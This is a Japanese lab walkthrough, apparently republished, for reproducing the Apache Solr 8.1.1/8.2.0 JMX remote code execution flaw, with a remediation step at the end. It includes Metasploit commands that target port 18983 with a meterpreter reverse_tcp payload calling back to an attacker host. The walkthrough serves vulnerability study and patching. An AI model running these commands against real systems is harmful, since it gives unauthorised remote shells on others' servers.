ホームページ > 運用・保守 > 安全性 > Apache Solr JMX サービスで RCE 脆弱性を再現する方法

Apache Solr JMX サービスで RCE 脆弱性を再現する方法

WBOY
リリース: 2023-05-14 14:25:06
転載
1479 人が閲覧しました

0x00はじめに

Solr は、Web サービスに似た API インターフェイスを提供する独立したエンタープライズ レベルの検索アプリケーション サーバーです。ユーザーは、http リクエストを通じて特定の形式の XML ファイルを検索エンジン サーバーに送信してインデックスを生成できます。また、HTTP Get オペレーションを通じて検索リクエストを作成し、XML 形式で返された結果を取得することもできます。

この脆弱性は、デフォルト設定ファイル solr.in.sh の ENABLE_REMOTE_JMX_OPTS 設定オプションのセキュリティ リスクに起因します。

ENABLE_REMOTE_JMX_OPTS="true" オプションは、Apache Solr バージョン 8.1.1 および 8.2.0 の組み込み構成ファイル solr.in.sh に存在します。

影響を受けるバージョンのデフォルトの solr.in.sh ファイルを使用する場合、JMX モニタリングが有効になり、RMI_PORT (デフォルト = 18983) で公開されます。

何もする必要はありません。認証。このポートがファイアウォールの受信トラフィック用に開かれている場合、Solr ノードにネットワーク アクセスできる人は誰でも JMX にアクセスでき、

は悪意のあるコードをアップロードして Solr サーバー上で実行できるようになります。この脆弱性は Windows システムのユーザーには影響しませんが、Linux の一部のバージョンのユーザーにのみ影響します。

0x01 影響を受けるバージョン

Apache Solr8.1.1 バージョンのオンライン時間: 2019-05-28

Apache Solr8.2.0 バージョンのオンライン時間: 2019- 07-25

0x02 脆弱性の危険

被害者がこのデフォルト設定を使用すると、JMX サービスはデフォルトのポート 18983 で開かれ、認証は有効になりません。デフォルトでは。このポートにアクセスできる攻撃者は、この脆弱性を悪用して、影響を受けるサービスに対して攻撃を開始し、任意のコードを実行する可能性があります。

0x03 環境構築

Java 環境と kali システム、Solr 8.20

Solr 8.20 ダウンロードアドレス:

wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

如何进行Apache Solr JMX服务RCE漏洞复现

unzip solr-8.2.0.zip を使用して解凍します

如何进行Apache Solr JMX服务RCE漏洞复现#解凍が完了したら、bin ディレクトリに切り替えて Solr

./solr start -force

## を起動します。

#起動後のアクセス: http://192.168.10.176:8983/如何进行Apache Solr JMX服务RCE漏洞复现

如何进行Apache Solr JMX服务RCE漏洞复现#0x04 脆弱性再発

攻撃マシン: kali IP: 192.168.10.147

被害マシン: Ubuntu18.6 の docker IP: 192.168.10.184:8983

1. nmap を使用してポートをスキャンし、ポート 18983 が開いていることを確認します

2. Metasploit のexploit/multi/misc/java_jmx_server モジュールを使用して脆弱性を再現します如何进行Apache Solr JMX服务RCE漏洞复现

Ø 使用しますexploit/multi/misc/java_jmx_server

Ø set RHOST 192.168.10.184

Ø set RPORT 18983

ペイロードを設定: java/meterpreter/reverse_tcp如何进行Apache Solr JMX服务RCE漏洞复现

Ø set ペイロード java /meterpreter/ reverse_tcp

Ø set LHOST 192.168.10.147

Ø set LPORT 4444

#3. run を使用して実行すると、次の内容が表示されます。正常に確立された接続如何进行Apache Solr JMX服务RCE漏洞复现

如何进行Apache Solr JMX服务RCE漏洞复现0x05 修正提案

solr.in.sh 設定ファイルの ENABLE_REMOTE_JMX_OPTS オプションを false に設定し、 Solr サーブを再起動します。

以上がApache Solr JMX サービスで RCE 脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート